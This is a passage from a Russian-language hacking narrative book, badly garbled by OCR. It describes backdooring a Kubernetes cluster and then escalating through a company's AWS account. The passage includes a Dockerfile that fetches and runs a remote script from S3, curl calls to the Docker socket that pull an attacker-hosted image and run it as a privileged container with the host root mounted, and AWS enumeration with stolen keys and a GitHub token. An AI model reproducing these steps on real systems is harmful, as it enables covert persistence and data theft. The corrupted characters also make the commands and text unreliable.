Это задание загружает образ атагоп-пеігісѕ -со1Лесіог из еще од- 
ной контролируемой нами учетной записи АМГ5. Данный образ Ооскег 
имеет более развернутую структуру и может даже сойти за законное 
задание сбора метрик (листинг 9.7). 


Листинг 9.7: Ооскегїї!е, устанавливающий несколько пакетов 
и выполняющий скрипт при запуске 


# БоскегЕ Де 

ЕВОМ ЧеБлап: Биѕ&ег-511т 

КОМ ар ирЧафе && арі іпѕёа11 -у 914 таке 

КОМ ар іпѕЁа11 -у рготе{Веи$-магп1$Н-ехрогег 


СОРҮ іпіЄ.ѕ$ћҺ /маг/гип/іпіЄ. $ћ 


ЕМТВУРОТМТ [" /маг/гип/іпіё. 5" ] 


За фасадом из бесполезных пакетов и десятков фиктивных строк 
кода глубоко внутри 1114.51 мы размещаем инструкцию, которая за- 
гружает и выполняет наш пользовательский скрипт, размещенный 
на $3. Сначала этот удаленный скрипт будет безобидной фиктивной 
эхо-командой. В тот момент, когда мы хотим активировать этот бэк- 
дор, чтобы восстановить доступ к системе, мы перезаписываем файл 
на $3 с помощью нашего пользовательского интерпретатора. Это 
своего рода бездействующая оболочка, которую мы используем толь- 
ко в случае крайней необходимости. 

Этот подход, однако, не решит полностью первоначальную пробле- 
му видимости. Как только мы активируем нашу оболочку, в системе 
будет постоянно работать под, видимый каждому администратору 
Кирегпее$. 
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Один из способов оптимизации заключается в том, чтобы избежать 
выполнения нашего пользовательского стейджера непосредственно 
в поде сбора метрик. Мы будем использовать этот под для связи с со- 
кетом Роскег, который мы так удобно смонтировали, и передачи ука- 
зания запустить еще один контейнер на хосте, который со временем 
загрузит агент теѓегргеѓег. Под сбора метрик, выполнив свою задачу, 
может корректно завершить работу, в то время как наша оболочка 
продолжает беспрепятственно работать в своем собственном втором 
контейнере. 

Этот второй контейнер будет полностью невидим для Кибегпеез, 
поскольку он не привязан к существующему объекту, такому как Вер- 
1сабе{ или раепопЅеї, – его на узле просто взял и создал БоскКет. Этот 
контейнер продолжит работу в привилегированном режиме с ми- 
нимальным контролем. В листинге 9.8 приведены три команды сиг1 
для извлечения, создания и запуска такого контейнера через РросКег 
АРІ. Этот скрипт должен быть загружен и выполнен контейнером ап- 
агоп-меігісѕ -соДесфог, который мы определили ранее. 


Листинг 9.8. Скрипт для загрузки нового образа ГРоскег, создания 
контейнера и его запуска 


# Получение образа из регистра ЕСВ 
сиг \ 
--51Лепё \ 
--ипіх-ѕоскеё /маг/гип/ОосКег.$осКк \ 
"Һер: //Ооскег/ітадеѕ /сгеа{е?РготГтаде=881445392307.9Кг.есг.еи-иез$*\ 
-1.амахопамз . сот/раиѕе-атіб4" \ 
-Х РОЅТ 


# Создание контейнера из образа и монтирование директории / 
сиг \ 
--5Цепе \ 
--ипіх-ѕоске /маг/гип/Ооскег.ѕоск \ 
"Һер: //Ооскег/сопёаіпегѕ/сгеаёе? пате=раиѕе-до-атіб4-4413" \ 
-Х РОЅТ \ 
-Н "Сопёепё-Туре: арр1ісаёіоп/јѕоп" \ 
-4 '{ "Ітаде": "881445392307.кг.есг.еџ-меѕЁ-1. атагопамѕ. сот/раиѕе-атб4" ,\ 
"үо1итеѕ": {"/һоѕёоѕ5/": {}}, "НоѕСопҒід": {"Віпаѕ": ["/: /һоѕо5"1}}' 


# Запуск контейнера 
сиг \ 
--51Лепё \ 
--ипіх-ѕоске /маг/гип/Ооскег.ѕоск \ 
"Һер: //Ооскег/сопёаіпегѕ/раиѕе-до-атаб4-4413/ѕ#агё" \ 
-Х РОЅТ \ 
-Н "Сопёепё-Туре: арр1ісаёіоп/јѕоп" \ 
- -оиЁриё /еу/пи11 \ 
--мгібе-оиё "%{ҺЕЁр соде}" 


Чтобы еще больше скрыть наш зловредный контейнер, мы протас- 
киваем его среди множества контейнеров паузы (раизе сопѓаіпег), 
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которые обычно работают на любом узле. Контейнер паузы играет 
ключевую роль в архитектуре Кибегпеѓеѕ, поскольку это контейнер, 
который наследует все пространства имен, назначенные поду, и раз- 
деляет их с контейнерами внутри. Контейнеров паузы столько же, 
сколько и подов, так что еще один вряд ли вызовет удивление. 


В Киђетеїеѕ есть ресурс под названием тифа пд мер - 
Воок, который на лету исправляет манифесты модулей для внедрения 
контейнеров, томов и т. д. Его сложно настроить, но он может быть 
смертельно опасным инструментом для достижения постоянного 
присутствия. Однако чтобы надежно использовать поды в качестве 
оружия, нам нужно, чтобы кластер был версии не ниже 1.15. За допол- 
нительной информацией обратитесь к статье Алекса Леонхардта 
на Мейит: һї1рѕ;//тедіит.сот/оупі/мгіїіпд-а-уегу-раѕіс-кирегпеїеѕ-тиїаї- 
іпд-аатіѕѕіоп-умерһоок-398аБрсђЬбЗес. 


На данном этапе у нас довольно прочные позиции в кластере Ки- 
регпеїеѕ. Мы могли бы продолжать поддерживать процессы на слу- 
чайных узлах на случай, если кто-то уничтожит наши ресурсы Киђег- 
пеѓеѕ, но, надеюсь, ктому времени мы успеем закончить свои дела. 


Дополнительные ресурсы 


• Для получения дополнительной информации о полезных нагруз- 
ках теѓегргеѓег прочитайте статью О. Дж. Ривза Реер ГРіуе тю 5їаре- 
1е55 Меегргеег РауІоа@5 на сайте ћіїрѕ;//09.гарій7сот/. 

® (О возможностях тепсру и пргоёесї для выполнения шелл-кода мож- 
но прочитать в статье Шивама Шрирао Маке 5їѓаск Ехесиа Ме Агат: 
Вр //11.1у/3601ахп. 

• КеНеснуеЕТЕГоадег от @пѕхя обеспечивает проверку идеи на 
практике: ћіірѕ;//9/һир.сот/п5х2/ВейесііуеЕ! ҒГоайег/. Код хорошо до- 
кументирован, но требует некоторого знания заголовков ЕГЕ; см. 
ћіірѕ://Ох00ѕес.огаЛ/аіѕѕесііпд-апа-ехріоіѓіпд-е[}}1е5/7267/. 

• Подборку методов выполнения приложений только в памяти в - 
пих можно найти по адресу ћіїр;//ії.[у/3 5ҮМІТҮ. 


• пепЁа появился в ядре Гпих 3.17. Страница руководства для тетЁа_ 
сгеа{фе расподложена по адресу ћіїр;//ії.[у/Заеід27. 

• Дополнительные сведения о Ваетоп5е{ см. в документации Кибег- 
пеѓеѕ: ћїѓр;/ії.1у/2ТВктр8. 

® Справку по ОосКег можно найти в документации по АРІ: 11р5;/ 
аоскг1у/20Кг1скК. 


ЧАСТЬ ТУ 


ВРАГ ВНУТРИ 


Гравитация — это не разновидность истины. 
Это и есть истина. Всем, кто сомневается в этом, 
предлагаю выпрыгнуть из окна десятого этажа. 


Ричард Докинз 


ВРАГ ВНУТРИ 


В предыдущей главе мы получили доступ к кластеру до- 

ставки МХК Аб$5. Это дало нам сотни секретов, от ключей 

доступа АМ до токенов СііНир, обещая доступ практиче- 

ски клюбой базе данных, связанной с доставкой рекламы. 
Мы еще не являемся администраторами учетной записи 
АМҮ, но уже близки к этому. Нам нужно осмыслить все со- 
бранные нами данные и использовать их, чтобы найти способ повы- 
сить привилегии и даже, возможно, раскрыть скрытую связь между 
МХК Ад? и Стгеѓѕсһ Ро!ііісо. 


Путь к апофеозу 


Загрузим ключи доступа А\М/5, полученные из Кибегпеѓеѕ, и проверим 
разрешения случайного пользователя. Упомянутый в главе 8 Кевин, 
например, - такая же хорошая цель, как и любая другая: 


гоої@Роіпї1:~/# амѕ іам деё-иѕег --ргоҒі1е Кеуіп 
"ОЅѕег": { 

"ОзегМаме": "Кеуіп. ипсап", 
--5п1р- - 


Мы знаем, что по умолчанию пользователи [АМ не имеют на АМ! 
абсолютно никаких прав. Они не могут даже изменить собственные 
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пароли. Поэтому компании почти всегда предоставляют пользовате- 
лям достаточно прав на службу ІАМ, которая обрабатывает пользова- 
телей, и разрешения на выполнение основных операций, таких как из- 
менение паролей, включение многофакторной аутентификации ит. д. 
Чтобы ограничить область этих разрешений, администраторы час- 
то настраивают правило АРІ ТАМ, допускающее обработку запросов, 
предназначенных только для вызывающего пользователя. Например, 
Кевину, вероятно, разрешено просматривать свои собственные раз- 
решения, но не те, которые прикреплены к другим пользователям: 


гооЁ@Роіпї1:~/# амз іам 115-аёёасһей-иѕег-ро1ісіеѕ \ 
- -изег-паме=Кем Ал .дипсап \ 
--ргоғіЛе Кеуіп 


"Ро1ісуАгп": "агп:амѕ :іат: :886371554408:ро1ісу/тхгайѕ -ѕе1Ғ-тападе", 
"Ро11суАгп": "агп:амѕ :іат: :886371554408 :ро1ісу/тхгайѕ - геай-оп1у", 
"Ро1ісуАгп": "агп:амѕ :іат: :886371554408 :ро1ісу/тхгайѕ -екѕ-айтіп" 


Действительно, мы получаем сообщение об ошибке, как только вы- 
зываем команду ІАМ для ресурса, отличного от Кеуіп, например: 


гооЁ@Роіпї1:~/# амз іам деё-ро\ісу \ 
- -ро1ісу-агп тхгайѕ-ѕеї#-мападе \ 
- -рго Де Кеуіп 


Ап еггог оссиггед (Ассеѕ5репіей) ипеп са\14пд {Ве беЁРо1ісу орега\оп: 
Изег: агп:амѕ:1ат: :886371554408 : изег/Ке\4п.Чипсап 15 поё аџЁћогіғей фо 
регЁогт: іат:СеРо\ісу оп геѕоџгсе: ро1ісу 

агп:амѕ :іат: :886371554408:ро1ісу/тхгайѕ-екѕ-айтіп... 


Когда дело доходит до прав доступа, АМ5 реагирует жестко. К сча- 
стью, имена политик Кевина достаточно ясны, чтобы мы могли уга- 
дать их содержание: тхгайѕ -екѕ-айпіп указывает, что Кевин является 
администратором ЕК$, а пхга4$ -геад-оп1у, вероятно, предоставляет 
Кевину доступ на чтение к подмножеству из 165 сервисов АМ, ис- 
пользуемых МХК А4$. Остается только попытаться определить, каких 
именно. Последняя политика, тхгайѕ -ѕе1Ғ -тападе, должна содержать 
набор разрешений, позволяющих Кевину управлять своей учетной 
записью. 

Для полного изучения каждого из этих сервисов могут потребо- 
ваться часы и даже дни, особенно для компании, которая столько ин- 
вестировала в АМ и имеет такую сложную бизнес-архитектуру. Нам 
нужно сузить круг поиска: мы ищем все, что имеет хоть какое-то от- 
ношение к Стгеїѕсћ РоП@со, в частности информацию об их клиентах 
или деятельности по профилированию данных. Это может быть бакет 
53, содержащий сегменты 01° а! Аа Каїіпеѕ (РАВ), которые исполь- 
зуют для измерения эффективности рекламной кампании, таблица 
в базе данных ВО5, веб-сервер, работающий на ЕС2, прокси-сервис на 
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АРІ Саѓеуау, очередь сообщений на АМҮ ЅітрІе Очеце Ѕегуісе (505)... 
в любом из дюжины доступных в настоящее время регионов АМ. Да, 
я понимаю и разделяю ваше разочарование. 

К счастью, у АМ есть полезный АРІ, который охватывает несколь- 
ко типов ресурсов и сервисов в данном регионе: АРТ тегов групп ре- 
сурсов. Этот АРІ возвращает сегменты $5, конечные точки УРС, базы 
данных и т. д., при условии что объект имеет тег или метку. Любая 
компания, соблюдающая минимальную гигиену инфраструктуры, 
обязательно пометит свои ресурсы, хотя бы для целей выставления 
счетов. Поэтому мы можем быть достаточно уверены, что результаты, 
возвращаемые этим вызовом АРТ, являются точными и исчерпываю- 
щими. Начнем с получения перечня ресурсов для региона еџ-меѕї-1, 
как показано в листинге 10.1. 


Листинг 10.1. Список ресурсов для еч-мез*-1 


гооЁ@Роіпї1:~/# амѕ геѕоигседгоирѕЕаддіпдарі деЁ-геѕоигсеѕ \ 
--гедіоп еџ-меѕЁ-1 \ 
--ргоЁіЛе Кеуіп > Ёаддей_геѕоџгсеѕ_еџи1.ЕхЁ 


гооЁ@Роіпё1:~/# һеай +а99е4_гезоигсе$_еци1. хе 


ВезоигсеАВ№: агп:амѕ :ес2:еџ-меѕї-1:886371554408:урс/урс-01е638, 
Тад$: [ "Кеу": "Мате", "Маше": "ргімаїеМРС" ] 

- - Сокращено- - 

агп: аз: ес2:еи-мез{-1:886371554468 : ѕесигіёу-дгоир/59-07108... 
агп: аи : [ат6да:еи-мез{-1:886371554408 : Гипс Топ: ёад_іпех 

агп: аи :еуепіѕ :еи-мез{-1:886371554408 : ге /а59-соп&гоДег3 

агп: амѕ : ЧупатодЬ :еи-мез{-1:886371554408 : ёаБ1е/сгиіѕе саѕе 

- - Сокращено- - 


Если бы у Кевина не было необходимых привилегий для просмотра 
тегов ресурсов (ад: беВеѕоџгсеѕ), у нас не было бы другого выбора, 
кроме как вручную начать изучение наиболее часто используемых 
сервисов А\5, таких как ЕС2, 53, ГатБаа, ВО$, рупаторвВ, АРІ Саїѓе- 
мау, ЕСК, КМ5 и Ведѕћіќ. Кеаѕһій - это управляемая база данных Роѕі- 
ете501, оптимизированная для аналитики; рупаторвВ ~ это управля- 
емая нереляционная база данных, созданная по образцу МопғеорвВ; 
АРІ Саїѓемау – это управляемый прокси-сервер, который ретрансли- 
рует запросы на серверную часть по вашему выбору, а Гатбаа - это 
сервис, который запускает ваш код на собственных экземплярах АМ 
(подробнее об этом позже). Эти примитивные сервисы даже исполь- 
зуются внутри самой А\/5 для создания более сложных предложе- 
ний, таких как ЕК$, которые на самом деле представляют собой не 
что иное, как комбинацию ЕС2, ЕСК, АРІ Саѓеуау, ГатђЬаа, Рупаторв 
и других сервисов. 


ША 158 Существует множество инструментов АИ’ для 
аудита и пентестинга, которые позволяют просматривать сервисы 
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и ресурсы. Ознакомьтесь с подборкой Топйух на СіНир по адресу ћїїрѕ;// 
дйһир.сот/ЛАопађ!ух/ту-агѕепа!-оғаиѕ-ѕесигіїу-10015/. Имейте в виду, что 
большинство этих инструментов могут наводнить АИ вызовами АРІ. 
Подобные действия легко обнаруживаются при минимальном монито- 
ринге (подробнее об этом позже). 


Выполнив команды из листинга 10.1, мы получили более 8000 поме- 
ченных ресурсов из аккаунта МХЕ А5, поэтому, естественно, мы об- 
ратимся к нашей проверенной команде дгер для поиска ссылок на СР: 


гооєё@Роіпё1:~/# едгер -1 “дгеЁѕсһ|ро1і+ісо |9ро\\” ёаддей_геѕоџгсеѕ_еџи1. хі 


КеѕоигсеААМ№: агп:амѕ : 1ат6Ча:еи-ме${-1:886477354465 : Ғипсіоп: йтр-ѕупс-огеёѕсһ-ро1іїісо, 
--пір- - 


Чудесно! Мы нашли иголку в стоге сена. МХЕ Айѕ имеет функцию 
Гатбаа, которая, похоже, обменивается данными с Стгеіѕсһ РоН@со. 
АМҮЅ Гатбаа - это золотой стандарт бессерверного мира. Вы упако- 
вываете исходный код Руѓћоп, сценарий КиБу или двоичный файл Со 
в 71Р-файл, отправляете его в АМ/$ ГатђЬаа вместе с несколькими пе- 
ременными среды и спецификациями ЦП/памяти, и АҮ/Ѕ запускает 
его для вас. 

Этот процесс избавляет вас от хлопот, связанных с подготовкой ма- 
шины, настройкой ѕуѕёеті и 55Н. Вы просто указываете на 71Р-файл, 
и он выполняется в выбранное вами время. Функция ГатђЬаа может 
даже запускаться внешними событиями, которые инициированы 
другими сервисами АМГ$, такими как получение файла на 53. Гатбаа – 
это своего рода сгопќаБ, который изменил наш подход к управлению 
рабочими нагрузками. 

Давайте подробнее рассмотрим эту функцию Гатбаа под названи- 
ем дтр-зупс (листинг 10.2). 


Листинг 10.2. Описание функции [атЬаа 9тр-зупс 


гоо@Ро1п{1:-/# амѕ ТамЬЧа деё-ҒипсЕіоп \ 

- -Ғипсёіоп-пате йтр-ѕупс-дгеёѕсһ-ро1і+ісо \ 
--гедіоп еџ-меѕ-1 \ 

- -рго Де Кеуіп 


- -Сокращено- - 

КероѕіёогуТуре: 53, 

[оса 1оп: ВЕЁрз: //тхгайѕ-1атбдаѕ. 53.еџ-меѕї-1. атагопанѕ . сом/Рипс\оп$ /9трзупс- 
др?мегѕіопІд=ҮБЅа. .. 


В листинге 10.2 мы видим, что функция ГатђБаа извлекает ском- 
пилированный код, необходимый для выполнения, из пути 53 пх- 
гайѕ- 1амЬЧа$ /4тр-зупс-др. Мы сразу бросаемся к клавиатуре и наби- 
раем следующую команду: 
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гоої@Роіпё1:~/# амѕ 53арі деё-оБјесі \ 
--БисКеЕ мхгад$-ТамбЧа$ \ 

--Кеу Рипс\оп$ /9тр-зупс-др Чтр-зупс-др \ 
- -ргоР Де Кеуіп 


Ап еггог оссиггед (Ассеѕ5репіей) мпеп са114пд {Ве СефОБ)есЕ орега оп: 
Ассеѕ5 Репіей 


Но, увы, Кевину недостаточно доверяют, чтобы предоставить до- 
ступ к этому бакету. Мы могли бы построить дом из сообщений «От- 
казано в доступе», которые получили за последние пару дней. 

Мы еще раз внимательно смотрим на определение ІатЫаӣа и ви- 
дим, что оно олицетворяет роль АМГ$ 1атБаа-пр-ѕупс и что оно пола- 
гается на пару переменных среды для выполнения своих задач (лис- 
тинг 10.3). 


Листинг 10.3. Конфигурация функции ГатђБаа атр-зупс 


гооЁ@Роіпё1:~/# амѕ амда деё-Ғипсёіоп \ 

- -Ғипсёіоп-пате йтр-ѕупс-дгеёѕсһ-ро1і+ісо \ 
--гедіоп еџ-меѕё-1 \ 

- -ргоР Де Кеуіп 


- - Сокращено- - 
Ко1е: агп:амз : Там: :886371554408:го1е/Латрда-дтр-ѕупс, 
ЕпуігоптепЁ: { 
УагіаБ1еѕ: { 
© ЅЕСВОСКЕТ: тхгайѕ-1095, 
Ө ОЅТВОСКЕТ: дгеёѕсһ-ѕёгеатіпд- јоБѕ, 
ЅАСК_ МЕВНООК: АОІСАНајасіАмЁодхгеЕ887914..., 
рв 1065 РАЅ55: АОІСАНдЕ4Кегај896у0Тед93СҒмЕпер. .. 
- - Сокращено- - 


Эти настройки предполагают, что код работает с логами МХК А4$ 
Ө и, возможно, наполняет их дополнительной информацией, связан- 
ной с кампаниями по доставке, перед отправкой их в бакет $3 Стеіѕсћ 
Роіісо Ө. 

Мы понимаем, что этот бакет СР является внешним, потому что он 
не отображается в нашем текущем списке бакетов МХК Ад$. Излишне 
говорить, что нашему текущему ключу доступа будет категорически 
отказано даже в просмотре этого чужого сегмента, но мы точно зна- 
ем, что роль, связанная с ГатЪаа (ІатБаа-атр-ѕупс), может это де- 
лать. Вопрос в том, как нам заполучить эту роль. 

Один из возможных способов имитации роли Гатђбаа - обратить- 
ся к репозиторию СііНир, содержащему исходный код этой функции 
Татбаа, при условии что мы сможем найти учетную запись с досту- 
пом для чтения/записи. Тогда мы могли бы пронести контрабандой 
несколько строк кода, чтобы получить ключи доступа роли во время 
выполнения и использовать их для чтения содержимого бакета. Эта 
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процедура выглядит заманчиво, но она сопряжена со значительным 
риском. Благодаря уведомлениям по $1асК и электронной почте вся 
техническая команда разработчиков может моментально узнать даже 
о самом маленьком коммите на СієНир. Не очень хорошая перспек- 
тива. 

АМҮЅ предлагает естественный способ реализации любой роли че- 
рез АРІ $Т5, но, черт возьми, нам нужны какие-то привилегии для 
вызова этой команды. Ни один здравомыслящий администратор не 
стал бы включать АРІ $Т$ в политику только для чтения, назначенную 
разработчикам. 

Давайте пока отложим эту идею похищения роли и продолжим 
изучение других сервисов АМ. Наверняка найдется что-то, чем мы 
можем злоупотребить, чтобы повысить привилегии. 

Давайте покопаемся в сервисе ЕС2 и рассмотрим все запущенные 
экземпляры (листинг 10.4). Помните, как в прошлый раз, когда мы 
пробовали это сделать в главе 8, мы были ограничены узлами Киђег- 
пеѓеѕ? Благодаря политике доступа Кевина теперь мы свободны от 
ограничений. 


Листинг 10.4. Описание экземпляров ЕС2 еџ-меѕї-1 


гооЁ@Роіпї1:~/# амѕ ес2 йеѕсгіђе-іпѕЁапсеѕ \ 
- -гедіоп=еџи-меѕ-1 \ 
--ргоғіЛе Кеуіп > а11_іпѕёапсеѕ _еџи1.Ехё 


гооє@Роіп1:~/# Неад а11 іпѕЁапсеѕ_еџи1.ЕхЁ 


- -Сокращено- - 

"ІпѕЁёапсеІй": "1-09072954011е63аег", 
"ІпѕёапсеТуре": "с5.4х1агде", 

"Кеу": "Маме", "Ма1џе": "саѕѕапӣга-таѕёег-05789454" 


"ІпѕЁёапсеІй": "1-08777962411е1564#", 
"ІпѕёапсеТуре": "т5.8х1агде", 
"Кеу": "Мате", "Ма\ие": "1АБ- јоБѕ-йеу-7789559444е" 


"ІпѕЁёапсеІй": "1-08543949421е17а#", 

"ІпѕёапсеТуре": "с59.9х1агде", 

"Кеу": "Маме", "Ма1џе": "апа1уісѕ-Ёгаскег-маѕїег-7еЁесе4ае" 
- -Сокращено- - 


Мы обнаружили около 2000 машин только в регионе ец-мез{-1 – 
почти в три раза больше серверов, чем обрабатывает производствен- 
ный кластер Кибегпее$. МХК Аа почти не работает с Киђегпеїеѕ; им 
еще предстоит перенести остальные рабочие нагрузки и базы данных. 

Из этих 2000 машин нам нужно выбрать жертву. Забудем о биз- 
нес-приложениях; мы на собственном горьком опыте узнали, что МХК 
Ааѕ жестко блокирует свои роли ІАМ. Нам пришлось сражаться за каж- 
дое право доступа, который мы захватили в начале, чтобы провести 
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базовую разведку. Нет, чтобы добиться полного господства над АМ, 
нам нужно установить инструмент управления инфраструктурой. 


Захват инструментов автоматизации 


Даже располагая всеми возможностями автоматизации, которые 
предлагает АМГ5, ни одна команда не сможет работать с 2000 серверов 
и сотнями микросервисов без помощи обширного набора инструмен- 
тов для планирования, автоматизации и стандартизации операций. 
Мы ищем что-то вроде Випдеск, Сһеѓ, Јепкіпѕ, АпзШе, Тегга гит, Тга- 
уіѕСІ или любой другой из сотен инструментов РеуОрѕ. 


ШЕТ 15 На сайте @епа!. ай есть любопытный список некото- 
рых из самых известных инструментов ПеуОрѕ: һіїрѕ;//аідіѓа!.а//регіоа- 
с-юаЫЕе-о-аеуор5-10015. 


Тетгаогт помогает отслеживать компоненты, работающие в АМГ5, 
АпѕібІе настраивает серверы и устанавливает необходимые пакеты, 
Випаеск планирует задачи обслуживания баз данных, а Јепкіпѕ создает 
приложения и развертывает их в рабочей среде. Чем крупнее компа- 
ния, тем сильнее ей нужен надежный набор инструментов и стандар- 
тов для поддержки и подпитки дальнейшего роста. Давайте просмот- 
рим список запущенных машин в поисках названий инструментов: 


гооё@Роіп1:~/# едгер -1 -1 \ 
"јепкілѕ | гипдеск | сһе# | ёеггаҒогт | рирре* | сігс1е | гауіѕ |огарһіёе" а11 іпѕёапсеѕ еџм1.Ёхё 


"ІпѕёапсеІй": "1-09072954011е63аег", 
"Кеу": "Мате", "Ма1џе": "јепкіпѕ-таѕёег-6597899842" 
РгімаёерпѕМате": "ір-10-5-20-239.еџ-меѕЁ-1. сотриёе.іпёегпа1" 
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"ІпѕёапсеІй": "1-08777962411е1564#", 

"Кеу": "Маме", "Ма1џе": "сһеҒ-ѕегуег-таѕїег-8е7Ғеа545ей" 
РгімаёерпѕМате": "ір-10-5-29-139.еџ-меѕЁ-1. сотриёе.іпёегпа1" 


"ІпѕёапсеІй": "1-08777962411е1564#", 

"Кеу": "Мате", "Ма1џе": "јепкіпѕ-могКег-е7йе87айесс" 
РгімаёерпѕМате": "ір-10-5-10-58.еџ-меѕЁ-1.сотриїе.іпёегпа1" 
- -Сокращено- - 


Замечательно! Мы видим упоминания Јепкіпѕ и СһеЁ. Давайте со- 
средоточимся на этих двух компонентах, так как они имеют большой 
потенциал. 


Јепкіпѕ Всемогущий 


Јепкіпѕ — это сложное программное обеспечение, которое может выпол- 
нять множество задач. Разработчики, например, могут использоватьего 
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для компиляции, тестирования и отправки своего кода в производство 
вавтоматическом режиме. С этой целью, когда новый файл помещает- 
ся в репозиторий, СіїНир инициирует РОЅТ-запрос (веб-перехватчик) 
к Јепкіпѕ, который запускает сквозные тесты для только что отправлен- 
ной версии приложения. После слияния кода Јепкіпѕ автоматически за- 
пускает другое задание, которое развертывает код на рабочих серверах. 
Этот процесс широко известен как непрерывная интеграция / непрерыв- 
ная поставка (сопіїпиоизѕ іпѓіестаібіоп/сопііпиоиѕ аеНуегу, СІ/СР”). 

Администраторы, сдругой стороны, могут использовать его для вы- 
полнения определенных задач инфраструктуры, таких как создание 
ресурсов Киђегпеѓеѕ или создание новой машины на А\М/5. Специа- 
листы по данным могут планировать свои рабочие нагрузки, чтобы 
извлекать данные из базы данных, конвертировать их и отправлять 
в 53. Сценарии использования широко представлены в корпоратив- 
ном мире и ограничиваются только воображением (а иногда и трез- 
востью) сотрудников ОеуОрз. 

Такие инструменты, как Јепкіпѕ, фактически являются агентами, 
которые позволяют реализовать утопические идеи, открыто продви- 
гаемые философией реуОрѕ. В самом деле, практически невозможно 
взять произвольную компанию и внедрить в ней с нуля такую сложную 
методологию, как непрерывное тестирование и поставка. Почти пато- 
логическая одержимость автоматизацией каждой крошечной опера- 
ции превращает такие инструменты, как ЈепКіпѕ, из простых фрейм- 
ворков тестирования во всемогущих богов любой инфраструктуры. 

Поскольку Јепкіпѕ необходимо динамически тестировать и созда- 
вать приложения, токен доступа к СИНиь часто хранится где-то на 
диске. Также необходимо развернуть приложения и контейнеры в ра- 
бочей среде, поэтому администратор часто добавляет в АМ$ ключи 
доступа с ЕСК, ЕС2 и, возможно, 53 для записи в файл конфигурации 
Јепкіпѕ. Администраторы также нередко используют ЈепКіпѕ для за- 
пуска своих команд Теггаѓогт, а Теггаогт изначально имеет полный 
контроль над АМ. Значит, это может и ЈепКіпѕ. А поскольку ТеггаЮгт 
управляется заданиями ЈепКкіпѕ, почему бы не добавить команды Ки- 
регпеїеѕ, чтобы централизовать операции? Эй, несите сюда больше 
привилегий - они нужны ЈепКіп. 

При отсутствии тщательного контроля эти конвейеры СІ/СР” (в дан- 
ном случае Јепкіпѕ) могут быстро превратиться в сложное переплете- 
ние инфраструктурных нервных волокон, которые, если их осторож- 
но и осознанно потрогать, могут привести к экстазу – именно это мы 
и собираемся сделать. 

Мы честно пытаемся установить связь с Јепкіпѕ напрямую без 
аутентификации. Јепкіпѕ по умолчанию прослушивает порт 8080, по- 
этому мы используем нашу существующую оболочку теѓегргеѓег для 
отправки НТТР-запроса на сервер: 


# Наш взломанный под в кластере Кибегпефе$ 


пефегрге{фег > ехесифе сиг\ -Т -Х СЕТ -0 Вр: //1р-10-5-20-239.еџ-меѕЁ-1.сотрие.іпіегпа1:8080 
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НТТР/1.1 301 

[оса оп: НЕЁрз: / /мим. діЕҺиБ. сот/ҺиБ/оаиһ Лодіп 
сопёепё-уре: ёехі/һЕті; сһагѕеё=150-8859-1 

- -Сокращено- - 


Нам сразу отказывают. В конце концов, это нормально, что любая 
мало-мальски приличная компания, которая использует такой важ- 
ный компонент для доставки, обеспечивает минимальную защиту. 
Путь к Јепкіпѕ лежит не через парадную дверь, а через небольшую 
дверку для прислуги в конце переулка: сервер Сһеѓ, который, вероят- 
но, изначально помог настроить ЈепКіпѕ. 


Адская кухня 


Сһеғ, как и Апз1Ые, является инструментом настройки программно- 
го обеспечения. Вы регистрируете недавно установленную машину 
в Сһеѓ, ион извлекает и выполняет набор предопределенных инструк- 
ций, которые автоматически настраивают инструменты на этой ма- 
шине. Например, если на вашей машине должно работать веб-прило- 
жение, СһеҒустановит №ріпх, настроит клиент МУЗОГ, скопирует файл 
конфигурации $8Н, добавит пользователя-администратора и устано- 
вит любое другое указанное вами программное обеспечение. 

Инструкции по настройке написаны на Кибу и сгруппированы 
в то, что СһеЁ называет - эдакий каламбурчик! – поваренными книга- 
ми и рецептами. В листинге 10.5 показан пример рецепта Сһеѓ, ко- 
торый создает файл сопҒід. јѕоп и добавляет пользователя в группу 
Роскег. 


Листинг 10.5. Рецепт Сһеў, создающий файл соп#ід. јѕоп и добавляющий 
пользователя в группу Ооскег 


# гесіре. гЬ 


# Копируем файл ѕеед-сопҒід.јѕоп на новую машину 
соокБоок_#ҒіЛе сопҒід_јѕоп йо 

ѕоџгсе 'ѕеей-сопҒід. јѕоп' 

омпег 'гооЁ' 
епі 


# Добавляем пользователя айтіп в группу роскег 
дгоир 'Юоскег' о 
дгоир пате 'Ооскег' 
аррепа Ёгие 
петбегѕ 'айтіп' 
асііоп :тападе 
епі 
- - Сокращено- - 


' Одно из значений слова сһеЁ – шеф-повар. – Прим. перев. 
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Секреты и пароли – важнейший элемент конфигурации любого 
сервера, особенно того, который по самой природе своей взаимо- 
действует почти со всеми компонентами инфраструктуры. Я говорю 
о ЈепКіпѕ, конечно! 

Если вы буквально следуете правильным методичкам ОеуОрз, все 
должно быть автоматизировано, воспроизводимо и, что более важно, 
иметь версии. О нет, вы не можете просто взять и установить ЈепКкіпѕ 
или любой другой инструмент вручную. Вы должны использовать 
инструмент управления, такой как СһеЁ или АпѕіЫе, чтобы описать 
конфигурацию ЈепКкіпѕ и развернуть ее на совершенно новой машине. 
Любые изменения в этой конфигурации, такие как обновление под- 
ключаемого модуля или добавление пользователя, должны проходить 
через этот инструмент управления, который отслеживает, проверяет 
версии и тестирует изменения перед их применением в рабочей сре- 
де. В этом суть инфраструктуры как кода (ёгазгасгаге аз соае, Та5). 
Какая у разработчиков любимая система управления версиями для 
хранения кода? СЌНир, конечно! 

Мы можем быстро убедиться, что рецепты СВеЁ для этой задачи хра- 
нятся на СіїїНиБ, получив перечень частных репозиториев МХЕ АЯ 
и найдя все упоминания о поваренных книгах Сһеѓ, связанных с Јеп- 
Кіпѕ. Помните, что у нас уже есть действующий токен СіќНир, предо- 
ставленный Кибегпеїеѕ. Сначала мы извлекаем список репозиториев: 


# 115 героѕ.ру 
Ғгот діҺиБ ітрогЕ СіћиБ 
9 = Сіћиь("9с13031ааейсдсс3510012сс45#Ға#Бе89848020") 
Ғог геро іп 9.деі иѕег(). де героѕ(): 
ргіпі(геро.пате, геро.с1опе иг1) 


Затем мы ищем ссылки на такие ключевые слова, как соокБоок, Јеп- 
Кіпѕ, СВеЁ, гесіре ит. д. (листинг 10.6). 


Листинг 10.6. Список репозиториев МХК Ай, соответствующих хотя 
бы одному из ключевых слов сооКБоок, Јепкіпѕ и СһћеЁ 


гооЁ@Роіпї1:~/# руЕһоп3 115+ _героѕ.ру > 11$%_геро$. хе 

гооє@Роіпё1:~/# едгер -1 “сооКБоок | јепкіпѕ | сһе#” 115+_героѕ.хі 

соокБооК -депегаїог һр: / /оіЁһиЬ. сот/тхгайѕ /соокБооК -депегаќог. 91+ 
